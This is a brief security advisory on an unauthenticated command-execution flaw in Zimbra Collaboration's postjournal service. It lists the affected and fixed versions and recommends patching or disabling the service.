Name of the Vulnerable Software and Affected Versions:

Zimbra Collaboration versions prior to 8.8.15 Patch 46

Zimbra Collaboration versions 9 prior to 9.0.0 Patch 41

Zimbra Collaboration versions 10 prior to 10.0.9

Zimbra Collaboration versions 10.1 prior to 10.1.1

Description:

The postjournal service in Zimbra Collaboration sometimes allows unauthenticated users to execute commands. This issue is actively being exploited in the wild, with threat actors sending spam emails loaded with code that aims to exploit the flaw. The vulnerability allows attackers to execute arbitrary commands on affected installations, potentially leading to unauthorized access and code execution. Over 19,000 public Zimbra installations are vulnerable to code execution attacks.

Recommendations:

For Zimbra Collaboration versions prior to 8.8.15 Patch 46, update to version 8.8.15 Patch 46 or later.

For Zimbra Collaboration versions 9 prior to 9.0.0 Patch 41, update to version 9.0.0 Patch 41 or later.

For Zimbra Collaboration versions 10 prior to 10.0.9, update to version 10.0.9 or later.

For Zimbra Collaboration versions 10.1 prior to 10.1.1, update to version 10.1.1 or later.

As a temporary workaround, consider disabling the postjournal service until a patch is available.